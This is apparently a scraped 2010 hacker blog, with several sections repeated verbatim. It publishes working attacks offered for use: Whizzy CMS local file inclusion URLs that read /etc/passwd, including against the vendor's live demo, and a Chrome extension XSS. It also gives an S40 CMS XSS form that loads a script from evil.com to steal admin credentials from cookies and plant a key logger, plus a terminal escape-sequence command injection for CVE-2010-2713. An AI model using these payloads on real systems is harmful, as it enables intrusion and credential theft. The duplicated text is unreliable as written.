~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.02
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
PoC on live demo:
http://www.unverse.net/?../../../../../../../../../../../../etc/passwd
This is a special DefCon 18 kick off from me! See ya there ;)
Special Tnx : lun0s, proge, sToRm, progenic, gny
Thursday, July 29, 2010
Wednesday, July 28, 2010
Chrome's ListMyTabs XSS
ListMyTabs, a Google Chrome extension, which as you guessed lists all the open tabs/windows you have open by their title. So it takes whats ever in the title tags and pushes it on the list which is where our XSS comes from. If you goto a evil page with something like [img src="" onerror="alert('xss')"] in its title tags and you click ListMyTabs's browser action button we get a little alert box that says xss.
Not much of a blog post i know, but it was fun wasn't it?
Not much of a blog post i know, but it was fun wasn't it?
Monday, July 26, 2010
Using XSS to pwn
In this post i will go over how to pwn a server by exploiting just XSS. This is some what special circumstance but we will go over that a little later. I will also be targeting S40 CMS for this post and giving out a few XSS 0-days in the process :)
So our goal is to get the admin user name and password, but using XSS is not always the best way to go about it "note i said get login details not stealing sessions". Now due to some major security issues in S40 i can show you two ways to get the admin creds. If our victim checks the remember me box at the admin login page, S40 saves the user name and password "base64 encoded" in your cookie. Which brings us to our first XSS. S40 has a handy search function that happens to be open to XSS and allows for our entery point. Lets look at our attack code:
xss_attack.html #Remember we have to get our victim to visit this page.
[script languaje="JavaScript"]
function func(){
document.go.submit();
}
[/script]
[form action="http://s40.biz" name="go" method="POST"]
[input type='hidden' name='gsearchfield' value='"][script src=http://evil.com/xss.js][/script]']
[script]func();[/script]
The bold portion is our injection, the rest is just our form and javascript to auto submit. We see its including xss.js "Our XSS payload" from exil.com. Now xss.js's job is to get the cookie, scan it for login details and if it finds them, send them on to us. If not thats ok we can just move on to the next phase and have it inject more XSS in the user name "sfu" var in the cookie.
We do this because later when the victim goes to login, S40 will look in the cookie for user name and password data. Then if it finds data it push it into the appropriate input fields on the login page. So if we injected a key logger as our payload for the second phase, and the admin goes to login your payload gets run and you get the login details! There you have it, going from XSS to pwn. It just takes a perfect storm of XSS which is sadly all to common.
So our goal is to get the admin user name and password, but using XSS is not always the best way to go about it "note i said get login details not stealing sessions". Now due to some major security issues in S40 i can show you two ways to get the admin creds. If our victim checks the remember me box at the admin login page, S40 saves the user name and password "base64 encoded" in your cookie. Which brings us to our first XSS. S40 has a handy search function that happens to be open to XSS and allows for our entery point. Lets look at our attack code:
xss_attack.html #Remember we have to get our victim to visit this page.
[script languaje="JavaScript"]
function func(){
document.go.submit();
}
[/script]
[form action="http://s40.biz" name="go" method="POST"]
[input type='hidden' name='gsearchfield' value='"][script src=http://evil.com/xss.js][/script]']
[script]func();[/script]
The bold portion is our injection, the rest is just our form and javascript to auto submit. We see its including xss.js "Our XSS payload" from exil.com. Now xss.js's job is to get the cookie, scan it for login details and if it finds them, send them on to us. If not thats ok we can just move on to the next phase and have it inject more XSS in the user name "sfu" var in the cookie.
We do this because later when the victim goes to login, S40 will look in the cookie for user name and password data. Then if it finds data it push it into the appropriate input fields on the login page. So if we injected a key logger as our payload for the second phase, and the admin goes to login your payload gets run and you get the login details! There you have it, going from XSS to pwn. It just takes a perfect storm of XSS which is sadly all to common.
Friday, July 23, 2010
Conf. Con 2010 coming up!
Saturday, July 17, 2010
Having fun with CVE-2010-2713
Heres a fun little exploit i noticed the other day, at first i didnt have any idea wtf i was looking at. After a little research i found out that libvte was used by gnome-terminal and thats what really got me interested, it was something i could play with without having to do a bunch of shit ;p So whats going on anyway, well vte reports back a window or icon name to the term as if it was a command being issued and at the same time users are allowed to set the name of a window or icon and that is where the issue lies. The one catch is after the attack starts the victim has to hit the enter key to execute the command issued to the term from the attack, but this is very easy to get around. Ok lets test this baby out. Open a term and run this:
export PS1="\033]0;;ls\007" <= sets the window name to ;ls
Then this:
export PS1="\033]0;\a\e[21t\007" <= sends the window name to the term
Now all you have to do is hit enter and you should get a dir listing :D There is all kinds of ways to automate this so all the victim has to do is hit enter, you can even send a message telling the victim to hit enter to continue >:) Thats it, enjoy.
export PS1="\033]0;;ls\007" <= sets the window name to ;ls
Then this:
export PS1="\033]0;\a\e[21t\007" <= sends the window name to the term
Now all you have to do is hit enter and you should get a dir listing :D There is all kinds of ways to automate this so all the victim has to do is hit enter, you can even send a message telling the victim to hit enter to continue >:) Thats it, enjoy.
Wednesday, July 14, 2010
Whizzy CMS 10.01 0-day
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
PoC on live demo:
http://www.unverse.net/whizzydemo/?../../../../../../../../../../../../etc/passwd
Special Tnx : lun0s, proge, sToRm, progenic, gny
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
PoC on live demo:
http://www.unverse.net/whizzydemo/?../../../../../../../../../../../../etc/passwd
Special Tnx : lun0s, proge, sToRm, progenic, gny
Subscribe to:
Posts (Atom)